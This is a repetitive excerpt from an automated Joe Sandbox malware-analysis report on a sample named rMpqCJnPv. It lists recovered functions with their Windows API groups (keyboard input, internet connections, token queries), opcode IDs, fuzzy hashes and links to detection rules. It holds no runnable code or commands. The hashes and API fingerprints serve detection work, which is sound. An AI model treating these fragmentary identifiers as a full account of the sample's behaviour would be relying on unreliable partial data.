                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                                                    • Instruction ID: 9d0a2ef39a42157c948f73371f617436e6522d46d707736bf68cf6ea1567e72e
                                                                                                                    • Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
                                                                                                                    • Instruction Fuzzy Hash: BE41DC66604B4681EB14EF6AD49146DB360FBAAFD0B889432DF4E4777ACE39E4508360
                                                                                                                    Function 00007FF7BB88F014 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352109105-0
                                                                                                                    • Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                                                    • Instruction ID: fb211fe79a9d314166c5ade9623b32f5099be16129a58a8e26e04c93b2ded87e
                                                                                                                    • Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
                                                                                                                    • Instruction Fuzzy Hash: 3D419E36A08A4686EA12EF1DD888179B3A0FB55B84F954536CF5D83374DF3CE4618390
                                                                                                                    Function 00007FF7BB88AA04 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3076010158-0
                                                                                                                    • Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                                                    • Instruction ID: 782ba4a57b36e731d92a947c71acac1c6b81ef0113dc4e5da103fce8f8b87bee
                                                                                                                    • Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
                                                                                                                    • Instruction Fuzzy Hash: 69418A36A00B458AEB209F6ED8442AD77A1FB55B94FA44136CF0D537B8CF38E865C790
                                                                                                                    Function 00007FF7BB858B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                                                    • Instruction ID: ea11e154ae061bb0ae1b657c6426bef09c587c7656d44d79f2e7c13e37b4d4ef
                                                                                                                    • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                                                                    • Instruction Fuzzy Hash: 6F412EA1A0D64241FB709B2DE490679A6A0F766B94FD41132DFDA136FCCE3CD8A1C790
                                                                                                                    Function 00007FF7BB858CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 432972143-0
                                                                                                                    • Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                                                    • Instruction ID: 2a293c8e2172c58aa8adfe7c4b99f8e8c9330456d312ea789f5ddd2c4ddc2fbe
                                                                                                                    • Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
                                                                                                                    • Instruction Fuzzy Hash: 0231C961A0C68145EB70AB2DE4407B9A7E0FB76B54F950132DF99037A9CF3CD561C7A0
                                                                                                                    Function 00007FF7BB86D7DC Relevance: 6.1, APIs: 4, Instructions: 82networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1463438336-0
                                                                                                                    • Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                                                    • Instruction ID: 1181e776bf0005f476b47cd166483055b7761a3541c1815714f730b77f28c1a0
                                                                                                                    • Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
                                                                                                                    • Instruction Fuzzy Hash: 9131A232A0874282EB14EB1EE054779A351FBAABD4F441535DF4E47B5CDF2CE0649B90
                                                                                                                    Function 00007FF7BB823D98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7BB81A27B,?,?,?,00007FF7BB81A236), ref: 00007FF7BB823DB1
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7BB81A27B,?,?,?,00007FF7BB81A236), ref: 00007FF7BB823E13
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7BB81A27B,?,?,?,00007FF7BB81A236), ref: 00007FF7BB823E4D
                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7BB81A27B,?,?,?,00007FF7BB81A236), ref: 00007FF7BB823E77
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1557788787-0
                                                                                                                    • Opcode ID: 25a861fe2411cd7b7e0da0a01173a2db480df9a66baf5c5800189b1476d27112
                                                                                                                    • Instruction ID: e0da57caa5549f0c4a836c7a5111bdbf714eacea11b0cab43b249ff772925ecf
                                                                                                                    • Opcode Fuzzy Hash: 25a861fe2411cd7b7e0da0a01173a2db480df9a66baf5c5800189b1476d27112
                                                                                                                    • Instruction Fuzzy Hash: 69218421B1875185EA20AF1EA450029F6A5FB69FD0B885134DF8E63BACDF3CE4628750
                                                                                                                    Function 00007FF7BB88F8A8 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Long
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 847901565-0
                                                                                                                    • Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                                                    • Instruction ID: 44fd92ac147fab264dd6ac4aa98b141aecb2744b322fd954be4162c55eeb738e
                                                                                                                    • Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
                                                                                                                    • Instruction Fuzzy Hash: 2D21C721A08B4146EA10AB6D9C98239B750BF96BA0F954735DF6D477F8CF3CE411C390
                                                                                                                    Function 00007FF7BB89108C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2864067406-0
                                                                                                                    • Opcode ID: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                                                    • Instruction ID: b0eaabb996a8c6987dc8b98cb87b4ccb33f27a10755e697446a94a315647614b
                                                                                                                    • Opcode Fuzzy Hash: b766ee5e7a6f79c275b6e8452a41ed66ab3f515ad85ef8642b06b7120701f994
                                                                                                                    • Instruction Fuzzy Hash: 6531BE22A08A4585EB11EB2DE4543BDA360FB99B84F941232DF8D43BB8CF3CE455C750
                                                                                                                    Function 00007FF7BB8550E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                                                    • String ID: cdecl
                                                                                                                    • API String ID: 4031866154-3896280584
                                                                                                                    • Opcode ID: facad8ed80bb462bf53c29c7b0b6be99ba23f856b921fa2b4e9041d4f9308f95
                                                                                                                    • Instruction ID: 95ab7be96ed23fa9e3a8041e7f3f850a1edfe018b0e5add589cb5c7c2db74f37
                                                                                                                    • Opcode Fuzzy Hash: facad8ed80bb462bf53c29c7b0b6be99ba23f856b921fa2b4e9041d4f9308f95
                                                                                                                    • Instruction Fuzzy Hash: 6321B12160434185EA14BF1DD4A42B8B7A1FF6AFD0B885134EF5E473A8DF3DE4618394
                                                                                                                    Function 00007FF7BB84D6A0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocCopyErrorFreeLastLength
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 837644225-0
                                                                                                                    • Opcode ID: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                                                    • Instruction ID: 63e20b9a1391a3b1807295b2b0469bb5c317180e97edf9ac05c14de74c711211
                                                                                                                    • Opcode Fuzzy Hash: 9a34ca7cdec84128c61d79319dba9bc3ccc379250e2fae1bd0d7ccebff0f194a
                                                                                                                    • Instruction Fuzzy Hash: A6210232A04B418AEB00EF69D404768B3A6FB55B90F85403ACF5D03768DF3CE861C790
                                                                                                                    Function 00007FF7BB7E932C Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3970641297-0
                                                                                                                    • Opcode ID: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                                                    • Instruction ID: 632891a936def8bb89df38ef21a0af0394482425b753684773b38c268ba97044
                                                                                                                    • Opcode Fuzzy Hash: dfdf152a6b4170b9c012631cbf21b5eef6d1f67974f7a0a9349fa7dc94decf0b
                                                                                                                    • Instruction Fuzzy Hash: 102174326087C58AEB649B2DE4447AAB7A0FB99784F840135DF8D43B68DF3CE494CB00
                                                                                                                    Function 00007FF7BB812FB8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 697997973-0
                                                                                                                    • Opcode ID: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                                                    • Instruction ID: 083551fcf8d24947db4c17d2e267f5954d9d8976dbafaf257c852088bd737640
                                                                                                                    • Opcode Fuzzy Hash: 696024c0d85e9950b44dad3db47e8c6049c7f355de1dae667ed974782f5b2eb5
                                                                                                                    • Instruction Fuzzy Hash: 2211A42190D54682E611EA3CA04117BF2A5FFEF780FA44231FF894A7BDDE2DD4908A90
                                                                                                                    Function 00007FF7BB85CF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2979156933-0
                                                                                                                    • Opcode ID: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                                                    • Instruction ID: 4e701aae46489c263b0176168017cc36e83ed8f06f270e7aa3a5f6c806f7d1a0
                                                                                                                    • Opcode Fuzzy Hash: 2a49c66315dd4afd268b707153c3627d2a79b8a5ce35e179a418e828e304454b
                                                                                                                    • Instruction Fuzzy Hash: 8D210732A0878589E7109F2EB8401A6B691BB95BD4FC44135EE8D43B7CCF7CE1158790
                                                                                                                    Function 00007FF7BB88FA78 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 357397906-0
                                                                                                                    • Opcode ID: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                                                    • Instruction ID: 3a5ac05ee10a6c67a4bd31ab804a3bc7f0f3f09562df410365a211084f80dff9
                                                                                                                    • Opcode Fuzzy Hash: 30ca773a2ae41b56c6e1d6d31e0bfc9c1d6a93403dc69e79101ac1cf7de44ee4
                                                                                                                    • Instruction Fuzzy Hash: 0A21C5B6A047419FEB00DF78D84459C77B0F759B48B504826EF5893B2CDB78E664CB90
                                                                                                                    Function 00007FF7BB854B28 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1352324309-0
                                                                                                                    • Opcode ID: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                                                    • Instruction ID: 19bd7eb1372e38cc7be17dc5e9b2185c6be0273561ce1c6ef4a8c9ca40ea5529
                                                                                                                    • Opcode Fuzzy Hash: 26dceef0b12b748e4890be4283cc75c768f711def0b64c07a5df3002dea28784
                                                                                                                    • Instruction Fuzzy Hash: 4411B67270864282E7209F6DD0C5369A3A0FB95B48F945035CF8D4B56CCF7CE564CBA0
